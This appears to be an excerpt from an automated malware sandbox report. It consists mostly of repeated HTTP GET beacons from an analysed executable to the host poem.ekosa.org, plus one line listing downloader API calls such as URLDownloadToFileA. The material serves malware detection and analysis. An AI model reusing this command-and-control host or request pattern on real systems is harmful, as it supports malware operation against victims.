Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231780 GetTempPathA,GetTempFileNameA,DeleteFileA,DeleteFileA,DeleteUrlCacheEntry,URLDownloadToFileA,CreateFileA,GetFileSize,CloseHandle,DeleteFileA,LocalAlloc,ReadFile,LocalFree,CloseHandle,DeleteFileA,CloseHandle,DeleteFileA,LocalFree,CreateFileA,LocalFree,WriteFile,LocalFree,CloseHandle,DeleteFileA,CloseHandle,0_2_01231780
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
